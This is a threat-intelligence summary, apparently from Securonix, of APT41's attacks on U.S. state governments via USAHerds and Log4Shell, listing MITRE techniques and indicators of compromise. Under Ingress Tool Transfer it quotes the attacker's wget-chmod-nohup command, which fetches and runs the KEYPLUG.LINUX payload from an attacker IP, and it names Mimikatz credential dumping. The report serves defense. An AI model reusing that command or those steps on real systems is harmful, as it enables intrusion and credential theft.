Threat Research

Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments

Securonix

APT41’s operations against U.S. state governments leveraged multiple, overlapping campaigns: initial access via a USAHerds web app vulnerability (CVE-2021-44207) followed by Log4Shell (CVE-2021-44228) deserialization to deploy backdoors, including KEYPLUG.LINUX on Linux hosts. The operation combined aggressive recon and credential harvest, AD discovery, an in-memory dropper (DUSTPAN), and anti-analysis techniques (DEADEYE/DEADEYE.EMBED and VMProtect), with post-exploitation activity aiming to establish footholds and resilient C2. #APT41 #Log4Shell #KEYPLUG #DUSTPAN #DEADEYE #DEADEYE.EMBED

Keypoints

  • APT41 exploited USAHerds CVE-2021-44207 in multiple investigations, enabling broad compromise due to a shared machineKey value across installations.
  • Once access was gained, the actors performed extensive host/network reconnaissance and credential harvesting (Mimikatz, SAM/SYSTEM hives).
  • Active Directory reconnaissance was conducted using dsquery.exe/dsquery.dll to enumerate AD objects.
  • The campaign followed Log4Shell (CVE-2021-44228) exploitation with deserialization payloads to recon and deploy backdoors.
  • New Linux backdoor KEYPLUG.LINUX was deployed after exploiting Log4Shell, with C2 over multiple protocols (HTTP, TCP, KCP/UDP, WSS).
  • DUSTPAN acted as an in-memory dropper to facilitate deployment of a Cobalt Strike BEACON backdoor.
  • Anti-analysis techniques included DEADEYE/DEADEYE.EMBED (ADS storage), VMProtect packaging, and multi-section binary construction to hinder forensics.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – exploited a zero-day vulnerability in the USAHerds web application. “In three investigations from 2021, APT41 exploited a zero-day vulnerability in the USAHerds web application.” The vulnerability allowed compromise across installations due to default machineKey values.
  • [T1203] Exploitation for Client Execution – used Log4Shell to fetch and deserialize a remote Java object for code execution and deployed backdoors via deserialization payloads. “Exploiting this vulnerability, also known as Log4Shell, causes Java to fetch and deserialize a remote Java object, resulting in potential code execution.” And “deserialization payloads to perform reconnaissance and deploy backdoors.”
  • [T1105] Ingress Tool Transfer – downloaded and deployed KEYPLUG.LINUX using wget. “Sample commands used to deploy KEYPLUG.LINUX can be seen in Figure 6.” and “wget http://103.224.80[.]44:8080/kernel chmod 777 kernel mv kernel .kernel nohup ./.kernel”
  • [T1003.002] Credential Dumping – dumped SAM/NTLM credentials and used Mimikatz lsadump::sam. “they copied the local SAM and SYSTEM registry hives to a staging directory for credential harvesting and exfiltration. APT41 has additionally used Mimikatz to execute the lsadump::sam command on the dumped registry hives to obtain locally stored credentials and NTLM hashes.”
  • [T1069.002] Active Directory Discovery – enumerated AD objects with dsquery.exe/dsquery.dll. “Figure 7: dsquery Active Directory Reconnaissance Commands.”
  • [T1564.001] Hide Artifacts: Alternate Data Streams – DEADEYE.EMBED stored in an Alternate Data Stream to conceal payloads. “DEADEYE.EMBED variants embed the payload inside of the compiled binary rather than appended to the overlay…”
  • [T1497] Virtualization/Sandbox Evasion – VMProtect used to slow reverse engineering, with anti-analysis via multi-section binary packaging. “VMProtect to slow reverse engineering efforts” and “chunking a VMProtect packaged DEADEYE binary into multiple sections on disk.”

Indicators of Compromise

  • [IP] 103.224.80.44:8080 – host for kernel delivery and command retrieval during KEYPLUG.LINUX deployment
  • [Domain] libxqagv.ns.dns3.cf – attacker-controlled domain used in ping commands and C2 infrastructure
  • [URL] http://103.224.80.44:8080/kernel – URL used to fetch the KEYPLUG.LINUX payload
  • [MD5] 49f1daea8a115dd6fce51a1328d863cf – dsquery.exe MD5
  • [MD5] b108b28138b93ec4822e165b82e41c7a – dsquery.dll MD5
  • [CVE] CVE-2021-44207 – USAHerds vulnerability exploited by APT41
  • [CVE] CVE-2021-44228 – Log4Shell vulnerability exploited by APT41

Read more: https://www.mandiant.com/resources/apt41-us-state-governments